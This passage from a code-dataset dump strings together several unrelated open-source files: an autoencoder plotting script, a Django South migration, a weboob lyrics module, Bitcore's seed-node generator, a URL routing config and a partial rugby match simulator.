z1, z2 = np.random.random(2) < 0.5
y = ys[[-5, 5][z1]]
x = (uy * y + bias) / -ux
dy = [-20, 20][z1]
dx = [-20, 20][z2]
rad = not (z1 ^ z2)
ax.annotate(str(name), xy=(x, y), xytext=(dx, dy),
textcoords='offset points', ha='center',
color='#111111', alpha=0.5,
arrowprops=dict(
arrowstyle='->', color='#111111', alpha=0.5,
connectionstyle='arc3,rad={}0.5'.format('+-'[rad])))
class IdentityEncoder:
label = 'Dim'
def __init__(self, axes):
self.axes = axes
def __call__(self, n, x):
return x
class FeatureEncoder:
label = 'Feature'
def __init__(self, axes, network):
self.axes = axes
self.network = network
def __call__(self, n, x):
z = self.network.encode(x.astype('f'))
logging.info('%s %s -> %s', n, x.shape, z.shape)
return z
class PcaEncoder:
label = 'PC'
def __init__(self, axes, dataset):
self.axes = axes
self.pca = sklearn.decomposition.PCA(1 + max(self.axes))
self.pca.fit(dataset)
logging.info('PCA variance %s', self.pca.explained_variance_.round(2))
def __call__(self, n, x):
try:
z = self.pca.transform(x)  # sklearn PCA exposes transform(), not encode()
logging.info('%s %s -> %s', n, x.shape, z.shape)
return z
except:
return x
def plot(args, encode, dataset, net, plot_features=False):
encoders = net.find('hid1', 'w').get_value().T
decoders = net.find('out', 'w').get_value()
biases = net.find('hid1', 'b').get_value()
norms = np.sqrt((encoders * encoders).sum(axis=1))
noisy = dataset + np.random.randn(*dataset.shape)
shift = net.predict(noisy.astype('f')) - noisy
sizes = np.sqrt((shift * shift).sum(axis=1))
encoders_ = encode('encode', encoders)
decoders_ = encode('decode', decoders)
dataset_ = encode('data', dataset)
noisy_ = encode('noisy', noisy)
shift_ = encode('shift', shift)
last = len(encode.axes) - 1
for row, i in enumerate(encode.axes[1:]):
bottom = row == last - 1 and ' bottom' or ''
ymin = noisy_[:, i].min()
ymax = noisy_[:, i].max()
ypad = (ymax - ymin) * 0.2
ys = np.linspace(ymin - ypad, ymax + ypad, 127)
for col, j in enumerate(encode.axes[:-1]):
if col > row:
continue
left = col == 0 and ' left' or ''
pl = last, last, row * last + col + 1
ax = lmj.plot.create_axes(pl, spines=left + bottom)
#ax.plot(mus[:, j], mus[:, i])
ax.scatter(dataset_[:, j], dataset_[:, i], marker='.', alpha=0.1)
xmin = noisy_[:, j].min()
xmax = noisy_[:, j].max()
xpad = (xmax - xmin) * 0.2
xs = np.linspace(xmin - xpad, xmax + xpad, 127)
#for f, u in enumerate(decoders_):
# ax.arrow(0, 0, u[j], u[i], color='#2ca02c', lw=2)
if plot_features:
for name, (plane, bias, norm) in enumerate(zip(encoders_, biases, norms)):
plot_feature(ax, xs, ys, plane[j], plane[i], bias, norm, name)
style = dict(arrowstyle='->', color='#1f77b4', alpha=0.3)
for source, delta, norm in zip(noisy_, shift_, sizes):
sx, sy = source[j], source[i]
dx, dy = delta[j], delta[i]
if angle_between(dx * dx + dy * dy, norm) < TAU / 8:
ax.annotate('', xy=(sx + dx, sy + dy), xytext=(sx, sy), arrowprops=style)
ax.set_xlim(xs[0], xs[-1])
if bottom: ax.set_xlabel('{} {}'.format(encode.label, j + 1))
ax.set_ylim(ys[0], ys[-1])
if left: ax.set_ylabel('{} {}'.format(encode.label, i + 1))
def main(args):
if args.seed:
np.random.seed(args.seed)
dataset = np.asarray(create_dataset(args), 'f')
dataset -= dataset.mean(axis=0)
D = args.dimensions
e = theanets.Experiment(
theanets.Autoencoder,
layers=[D, (args.features, args.activation), D])
encode = None
if args.plot_dimensions:
encode = IdentityEncoder(args.plot_dimensions)
elif args.plot_features:
encode = FeatureEncoder(args.plot_features, e.network)
else:
encode = PcaEncoder(args.plot_pcs or list(range(args.dimensions)), dataset)
for i, _ in enumerate(e.itertrain(dataset, **vars(args))):
pass
plot(args, encode, dataset, e.network,
plot_features=not isinstance(encode, FeatureEncoder))
lmj.plot.show()
if __name__ == '__main__':
climate.call(main)
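# Example invocation (flag names come from the climate.add_arg calls above;
# the values are arbitrary):
#   python en-dee.py --dimensions 10 --samples 1000 --clusters 20 --seed 1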
| mit | 2,385,183,796,207,257,000 | 31.462617 | 93 | 0.549158 | false |
fgaudin/aemanager | accounts/migrations/0012_auto__add_field_expense_supplier.py | 1 | 12652 |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Expense.supplier'
db.add_column('accounts_expense', 'supplier', self.gf('django.db.models.fields.CharField')(max_length=70, null=True, blank=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'Expense.supplier'
db.delete_column('accounts_expense', 'supplier')
models = {
'accounts.expense': {
'Meta': {'object_name': 'Expense', '_ormbases': ['core.OwnedObject']},
'amount': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'date': ('django.db.models.fields.DateField', [], {'db_index': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'ownedobject_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.OwnedObject']", 'unique': 'True', 'primary_key': 'True'}),
'payment_type': ('django.db.models.fields.IntegerField', [], {}),
'reference': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'supplier': ('django.db.models.fields.CharField', [], {'max_length': '70', 'null': 'True', 'blank': 'True'})
},
'accounts.invoice': {
'Meta': {'ordering': "['invoice_id']", 'object_name': 'Invoice', '_ormbases': ['core.OwnedObject']},
'amount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'customer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contact.Contact']", 'null': 'True', 'blank': 'True'}),
'discount_conditions': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'edition_date': ('django.db.models.fields.DateField', [], {'db_index': 'True'}),
'execution_begin_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'execution_end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'invoice_id': ('django.db.models.fields.IntegerField', [], {}),
'ownedobject_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.OwnedObject']", 'unique': 'True', 'primary_key': 'True'}),
'paid_date': ('django.db.models.fields.DateField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'payment_date': ('django.db.models.fields.DateField', [], {'db_index': 'True'}),
'payment_type': ('django.db.models.fields.IntegerField', [], {}),
'penalty_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'penalty_rate': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '4', 'decimal_places': '2', 'blank': 'True'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '1', 'db_index': 'True'})
},
'accounts.invoicerow': {
'Meta': {'object_name': 'InvoiceRow'},
'amount': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'balance_payments': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'category': ('django.db.models.fields.IntegerField', [], {}),
'invoice': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'invoice_rows'", 'to': "orm['accounts.Invoice']"}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'ownedobject_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.OwnedObject']", 'unique': 'True', 'primary_key': 'True'}),
'proposal': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'invoice_rows'", 'to': "orm['project.Proposal']"}),
'quantity': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '1'}),
'unit_price': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contact.address': {
'Meta': {'object_name': 'Address', '_ormbases': ['core.OwnedObject']},
'city': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contact.Country']", 'null': 'True', 'blank': 'True'}),
'ownedobject_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.OwnedObject']", 'unique': 'True', 'primary_key': 'True'}),
'street': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'zipcode': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '10', 'blank': 'True'})
},
'contact.contact': {
'Meta': {'object_name': 'Contact', '_ormbases': ['core.OwnedObject']},
'address': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contact.Address']"}),
'company_id': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '50', 'blank': 'True'}),
'contact_type': ('django.db.models.fields.IntegerField', [], {}),
'contacts': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'contacts_rel_+'", 'null': 'True', 'to': "orm['contact.Contact']"}),
'email': ('django.db.models.fields.EmailField', [], {'default': "''", 'max_length': '75', 'blank': 'True'}),
'firstname': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'function': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'legal_form': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'ownedobject_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.OwnedObject']", 'unique': 'True', 'primary_key': 'True'}),
'representative': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'representative_function': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'})
},
'contact.country': {
'Meta': {'ordering': "['country_name']", 'object_name': 'Country'},
'country_code2': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'country_code3': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'country_name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.ownedobject': {
'Meta': {'object_name': 'OwnedObject'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'project.project': {
'Meta': {'object_name': 'Project', '_ormbases': ['core.OwnedObject']},
'customer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contact.Contact']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'ownedobject_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.OwnedObject']", 'unique': 'True', 'primary_key': 'True'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '1', 'db_index': 'True'})
},
'project.proposal': {
'Meta': {'ordering': "['begin_date', 'update_date']", 'object_name': 'Proposal', '_ormbases': ['core.OwnedObject']},
'amount': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'begin_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'contract_content': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'expiration_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'ownedobject_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.OwnedObject']", 'unique': 'True', 'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['project.Project']"}),
'reference': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '1', 'db_index': 'True'}),
'update_date': ('django.db.models.fields.DateField', [], {})
}
}
complete_apps = ['accounts']
| agpl-3.0 | 5,774,475,095,478,383,000 | 81.155844 | 183 | 0.551138 | false |
laurentb/weboob | modules/lyricsmode/module.py | 1 | 1723 |
# -*- coding: utf-8 -*-
# Copyright(C) 2016 Julien Veyssier
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.
from weboob.capabilities.lyrics import CapLyrics, SongLyrics
from weboob.tools.backend import Module
from weboob.tools.compat import quote_plus
from .browser import LyricsmodeBrowser
__all__ = ['LyricsmodeModule']
class LyricsmodeModule(Module, CapLyrics):
NAME = 'lyricsmode'
MAINTAINER = u'Julien Veyssier'
EMAIL = '[email protected]'
VERSION = '2.1'
DESCRIPTION = 'Lyricsmode.com lyrics website'
LICENSE = 'AGPLv3+'
BROWSER = LyricsmodeBrowser
def get_lyrics(self, id):
return self.browser.get_lyrics(id)
def iter_lyrics(self, criteria, pattern):
return self.browser.iter_lyrics(criteria, quote_plus(pattern.encode('utf-8')))
def fill_songlyrics(self, songlyrics, fields):
if 'content' in fields:
sl = self.get_lyrics(songlyrics.id)
songlyrics.content = sl.content
return songlyrics
OBJECTS = {
SongLyrics: fill_songlyrics
}
| lgpl-3.0 | -4,821,468,968,850,700,000 | 31.509434 | 86 | 0.713871 | false |
LIMXTEC/BitCore | contrib/seeds/generate-seeds.py | 1 | 4341 |
#!/usr/bin/env python3
# Copyright (c) 2014-2017 Wladimir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Script to generate list of seed nodes for chainparams.cpp.
This script expects two text files in the directory that is passed as an
argument:
nodes_main.txt
nodes_test.txt
These files must consist of lines in the format
<ip>
<ip>:<port>
[<ipv6>]
[<ipv6>]:<port>
<onion>.onion
0xDDBBCCAA (IPv4 little-endian old pnSeeds format)
The output will be two data structures with the peers in binary format:
static SeedSpec6 pnSeed6_main[]={
...
}
static SeedSpec6 pnSeed6_test[]={
...
}
These should be pasted into `src/chainparamsseeds.h`.
'''
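# For example (illustrative), a nodes_main.txt line "1.2.3.4:8555" is emitted as
#   {{0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0x01,0x02,0x03,0x04}, 8555}
# because IPv4 addresses are embedded in the IPv6 ::ffff:0:0/96 range (pchIPv4 below).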
from base64 import b32decode
from binascii import a2b_hex
import sys, os
import re
# ipv4 in ipv6 prefix
pchIPv4 = bytearray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff])
# tor-specific ipv6 prefix
pchOnionCat = bytearray([0xFD,0x87,0xD8,0x7E,0xEB,0x43])
def name_to_ipv6(addr):
if len(addr)>6 and addr.endswith('.onion'):
vchAddr = b32decode(addr[0:-6], True)
if len(vchAddr) != 16-len(pchOnionCat):
raise ValueError('Invalid onion %s' % addr)
return pchOnionCat + vchAddr
elif '.' in addr: # IPv4
return pchIPv4 + bytearray((int(x) for x in addr.split('.')))
elif ':' in addr: # IPv6
sub = [[], []] # prefix, suffix
x = 0
addr = addr.split(':')
for i,comp in enumerate(addr):
if comp == '':
if i == 0 or i == (len(addr)-1): # skip empty component at beginning or end
continue
x += 1 # :: skips to suffix
assert(x < 2)
else: # two bytes per component
val = int(comp, 16)
sub[x].append(val >> 8)
sub[x].append(val & 0xff)
nullbytes = 16 - len(sub[0]) - len(sub[1])
assert((x == 0 and nullbytes == 0) or (x == 1 and nullbytes > 0))
return bytearray(sub[0] + ([0] * nullbytes) + sub[1])
elif addr.startswith('0x'): # IPv4-in-little-endian
return pchIPv4 + bytearray(reversed(a2b_hex(addr[2:])))
else:
raise ValueError('Could not parse address %s' % addr)
def parse_spec(s, defaultport):
match = re.match('\[([0-9a-fA-F:]+)\](?::([0-9]+))?$', s)
if match: # ipv6
host = match.group(1)
port = match.group(2)
elif s.count(':') > 1: # ipv6, no port
host = s
port = ''
else:
(host,_,port) = s.partition(':')
if not port:
port = defaultport
else:
port = int(port)
host = name_to_ipv6(host)
return (host,port)
def process_nodes(g, f, structname, defaultport):
g.write('static SeedSpec6 %s[] = {\n' % structname)
first = True
for line in f:
comment = line.find('#')
if comment != -1:
line = line[0:comment]
line = line.strip()
if not line:
continue
if not first:
g.write(',\n')
first = False
(host,port) = parse_spec(line, defaultport)
hoststr = ','.join(('0x%02x' % b) for b in host)
g.write(' {{%s}, %i}' % (hoststr, port))
g.write('\n};\n')
def main():
if len(sys.argv)<2:
print(('Usage: %s <path_to_nodes_txt>' % sys.argv[0]), file=sys.stderr)
exit(1)
g = sys.stdout
indir = sys.argv[1]
g.write('#ifndef BITCORE_CHAINPARAMSSEEDS_H\n')
g.write('#define BITCORE_CHAINPARAMSSEEDS_H\n')
g.write('/**\n')
g.write(' * List of fixed seed nodes for the bitcore network\n')
g.write(' * AUTOGENERATED by contrib/seeds/generate-seeds.py\n')
g.write(' *\n')
g.write(' * Each line contains a 16-byte IPv6 address and a port.\n')
g.write(' * IPv4 as well as onion addresses are wrapped inside a IPv6 address accordingly.\n')
g.write(' */\n')
with open(os.path.join(indir,'nodes_main.txt'),'r') as f:
process_nodes(g, f, 'pnSeed6_main', 8555)
g.write('\n')
with open(os.path.join(indir,'nodes_test.txt'),'r') as f:
process_nodes(g, f, 'pnSeed6_test', 19335)
g.write('#endif // BITCORE_CHAINPARAMSSEEDS_H\n')
if __name__ == '__main__':
main()
| mit | -4,901,292,662,621,745,000 | 30.456522 | 98 | 0.571067 | false |
cardmaster/makeclub | controlers/url.py | 1 | 3202 |
'''Copyright(C): Leaf Johnson 2011
This file is part of makeclub.
makeclub is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
makeclub is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with makeclub. If not, see <http://www.gnu.org/licenses/>.
'''
'''
We use this rule:
/clubs -> list clubs, or give more search query
/club/<slug> display one club(slug=<slug>), if not exists, return 404
/club/<slug>/edit edit club with slubg=<slug>, if not exists, create one
/club/<slug>/delete delete club with slubg=<slug>, if not exists, create one
/member/<slug>[/<user>] edit membership of club(slug=<slug>), user=<user>(current_user if omitted),
when post data to a non-exits membership, will cause a create.
/activity/<slug>/<aid> display activity of a club(slug=<slug>, aid=<aid)
/activity/<slug>/<aid>/edit edit activity of a club(slug=<slug>, aid=<aid)
/activity/<slug>/<aid>/(join|quit|confirm) join an activity of a club(slug=<slug>, aid=<aid), if specify an 'targetUser'
field in request data, will cause this targetUser join this activity
'''
import re
import os.path
pathjoin = os.path.join
def extPattern(base):
return base + '($|/.*)'
class ModuleUrlConf(object):
@staticmethod
def generatePattern(base):
return (base % '(\S+)')
def __init__(self, base, pattern=''):#Base url must have a %s, to specify the variable part
self.base = base
if (not pattern):
self.pattern = ModuleUrlConf.generatePattern(base)
else:
self.pattern = pattern
def path(self, *args):
strs = tuple ([str(arg) for arg in args])
return self.base % strs
def analyze(self, path):
reg = re.compile(self.pattern)
mat = reg.match (path)
if (mat):
try:
return mat.groups()
except:
return []
else:
return []
from helper import splitPath
class MemberUrlConf(ModuleUrlConf):
def __init__(self, stub):
super(MemberUrlConf, self).__init__(stub + '/%s/%s', stub + '/.*')
self.stub = stub
def path(self, slug, user=''):
return ModuleUrlConf.path(self, slug, user)
def analyze(self, path):
result = splitPath(path, self.stub, 2)
return result
urldict = dict (
ClubList = ModuleUrlConf('/clubs', extPattern('(/$|/clubs)') ),
ClubView = ModuleUrlConf('/club/%s', '/club/(\S+)/?$'),
ClubEdit = ModuleUrlConf('/club/%s/edit', '/club/(\S+)/edit/?$'),
Member = MemberUrlConf('/member'),
ClubPrivilige = MemberUrlConf('/priv'),
ActivityView = ModuleUrlConf('/act/id/%s', '/act/id/(\d+)/?$'),
ActivityEdit = ModuleUrlConf('/act/id/%s/edit', '/act/id/(\d+)/edit/?$'),
ActivityParticipate = ModuleUrlConf('/act/id/%s/%s', '/act/id/(\d+)/(join|quit|confirm|bill|rebill)/?$'),
ActivityNew = ModuleUrlConf('/act/new/%s', '/act/new/(\S+)/?$'),
Test = ModuleUrlConf('/test/%s', extPattern('/test'))
)
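# Usage sketch:
#   urldict['ClubView'].path('my-club')          -> '/club/my-club'
#   urldict['ClubView'].analyze('/club/my-club') -> ('my-club',)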
| agpl-3.0 | -1,901,133,220,814,521,600 | 35.804598 | 120 | 0.682698 | false |
JoeJimFlood/RugbyPredictifier | 2020SuperRugby/matchup.py | 1 | 16562 |
import os
os.chdir(os.path.dirname(__file__))
import sim_util
import sys
import pandas as pd
import numpy as np
from numpy.random import poisson, uniform
from numpy import mean
import time
import math
po = False
team_homes = pd.read_csv(os.path.join(os.path.split(__file__)[0], 'TeamHomes.csv'), header = None, index_col = 0)
stadium_locs = pd.read_csv(os.path.join(os.path.split(__file__)[0], 'StadiumLocs.csv'), index_col = 0)
teamsheetpath = os.path.join(os.path.split(__file__)[0], 'Score Tables')
compstat = {'TF': 'TA', 'TA': 'TF', #Dictionary to use to compare team stats with opponent stats
'CF': 'CA', 'CA': 'CF',
'CON%F': 'CON%A', 'CON%A': 'CON%F',
'PF': 'PA', 'PA': 'PF',
'DGF': 'DGA', 'DGA': 'DGF'}
def weighted_variance(data, weights):
assert len(data) == len(weights), 'Data and weights must be same length'
weighted_average = np.average(data, weights = weights)
v1 = weights.sum()
v2 = np.square(weights).sum()
return (weights*np.square(data - weighted_average)).sum() / (v1 - (v2/v1))
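# e.g. weighted_variance(np.array([1., 2., 3.]), np.array([1., 1., 2.])) == 1.1:
# the weighted mean is 2.25 and the denominator v1 - v2/v1 = 4 - 6/4 = 2.5.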
def get_opponent_stats(opponent, venue): #Gets summaries of statistics for opponent each week
opponent_stats = {}
global teamsheetpath, stadium_locs, team_homes
opp_stats = pd.read_csv(os.path.join(teamsheetpath, opponent + '.csv'), index_col = 0)  # DataFrame.from_csv was removed from pandas
opponent_home = team_homes[1][opponent]
(venue_lat, venue_lng) = stadium_locs.loc[venue, ['Lat', 'Long']]
(opponent_home_lat, opponent_home_lng) = stadium_locs.loc[opponent_home, ['Lat', 'Long']]
opponent_reference_distance = geodesic_distance(opponent_home_lat, opponent_home_lng, venue_lat, venue_lng)
def get_opponent_weight(location):
return get_travel_weight(location, opponent_home_lat, opponent_home_lng, opponent_reference_distance)
opp_stats['Weight'] = opp_stats['VENUE'].apply(get_opponent_weight)
for stat in opp_stats.columns:
if stat != 'VENUE':
if stat != 'OPP':
opponent_stats.update({stat: np.average(opp_stats[stat], weights = opp_stats['Weight'])})
try:
opponent_stats.update({'CON%F': float((opp_stats['CF']*opp_stats['Weight']).sum())/(opp_stats['TF']*opp_stats['Weight']).sum()})
except ZeroDivisionError:
opponent_stats.update({'CON%F': 0.75})
try:
opponent_stats.update({'CON%A': float((opp_stats['CA']*opp_stats['Weight']).sum())/(opp_stats['TA']*opp_stats['Weight']).sum()})
except ZeroDivisionError:
opponent_stats.update({'CON%A': 0.75})
return opponent_stats
def get_residual_performance(score_df): #Get how each team has done compared to the average performance of their opponents
global teamsheetpath, team_homes, stadium_locs
#score_df = pd.DataFrame.from_csv(os.path.join(teamsheetpath, team + '.csv'))
residual_stats = {}
residual_variances = {}
score_df['CON%F'] = np.nan
score_df['CON%A'] = np.nan
for week in score_df.index:
opponent_stats = get_opponent_stats(score_df['OPP'][week], score_df['VENUE'][week])
for stat in opponent_stats:
if week == score_df.index.tolist()[0]:
score_df['OPP_' + stat] = np.nan
            score_df.loc[week, 'OPP_' + stat] = opponent_stats[stat]
        score_df.loc[week, 'CON%F'] = float(score_df['CF'][week]) / score_df['TF'][week]
        score_df.loc[week, 'CON%A'] = float(score_df['CA'][week]) / score_df['TA'][week]
for stat in opponent_stats:
if stat == 'Weight':
continue
score_df['R_' + stat] = score_df[stat] - score_df['OPP_' + compstat[stat]]
if stat in ['TF', 'PF', 'DGF', 'TA', 'PA', 'DGA']:
residual_stats.update({stat: np.average(score_df['R_' + stat], weights = score_df['Weight'])})
residual_variances[stat] = weighted_variance(score_df['R_' + stat], score_df['Weight'])
elif stat == 'CON%F':
try:
residual_stats.update({stat: (score_df['R_CON%F'].multiply(score_df['TF'])*score_df['Weight']).sum() / (score_df['TF']*score_df['Weight']).sum()})
except ZeroDivisionError:
residual_stats.update({stat: 0})
elif stat == 'CON%A':
try:
residual_stats.update({stat: (score_df['R_CON%A'].multiply(score_df['TA'])*score_df['Weight']).sum() / (score_df['TA']*score_df['Weight']).sum()})
            except ZeroDivisionError:
residual_stats.update({stat: 0})
return residual_stats, pd.Series(residual_variances)
#def get_score(expected_scores): #Get the score for a team based on expected scores
# score = 0
# if expected_scores['T'] > 0:
# tries = poisson(expected_scores['T'])
# else:
# tries = poisson(0.01)
# score = score + 6 * tries
# if expected_scores['P'] > 0:
# fgs = poisson(expected_scores['P'])
# else:
# fgs = poisson(0.01)
# score = score + 3 * fgs
# if expected_scores['DG'] > 0:
# sfs = poisson(expected_scores['DG'])
# else:
# sfs = poisson(0.01)
# score = score + 2 * sfs
# for t in range(tries):
# successful_con_determinant = uniform(0, 1)
# if successful_con_determinant <= expected_scores['CONPROB']:
# score += 2
# else:
# continue
# #if tries >= 4:
# # bp = True
# #else:
# # bp = False
# return (score, tries)
#def game(team_1, team_2,
# expected_scores_1, expected_scores_2,
# playoff = False): #Get two scores and determine a winner
# (score_1, tries_1) = get_score(expected_scores_1)
# (score_2, tries_2) = get_score(expected_scores_2)
# if tries_1 - tries_2 >= 3:
# bp1 = True
# bp2 = False
# elif tries_2 - tries_1 >= 3:
# bp1 = False
# bp2 = True
# else:
# bp1 = False
# bp2 = False
# if score_1 > score_2:
# win_1 = 1
# win_2 = 0
# draw_1 = 0
# draw_2 = 0
# if bp1:
# bpw1 = 1
# else:
# bpw1 = 0
# if bp2:
# bpl2 = 1
# else:
# bpl2 = 0
# bpl1 = 0
# bpw2 = 0
# bpd1 = 0
# bpd2 = 0
# lbp1 = 0
# if score_1 - score_2 <= 7:
# lbp2 = 1
# else:
# lbp2 = 0
# elif score_2 > score_1:
# win_1 = 0
# win_2 = 1
# draw_1 = 0
# draw_2 = 0
# if bp1:
# bpl1 = 1
# else:
# bpl1 = 0
# if bp2:
# bpw2 = 1
# else:
# bpw2 = 0
# bpw1 = 0
# bpl2 = 0
# bpd1 = 0
# bpd2 = 0
# lbp2 = 0
# if score_2 - score_1 <= 7:
# lbp1 = 1
# else:
# lbp1 = 0
# else:
# if playoff:
# win_1 = 0.5
# win_2 = 0.5
# draw_1 = 0
# draw_2 = 0
# bpw1 = 0
# bpw2 = 0
# bpd1 = 0
# bpd2 = 0
# bpl1 = 0
# bpl2 = 0
# lbp1 = 0
# lbp2 = 0
# else:
# win_1 = 0
# win_2 = 0
# draw_1 = 1
# draw_2 = 1
# bpw1 = 0
# bpw2 = 0
# bpl1 = 0
# bpl2 = 0
# lbp1 = 0
# lbp2 = 0
# if bp1:
# bpd1 = 1
# else:
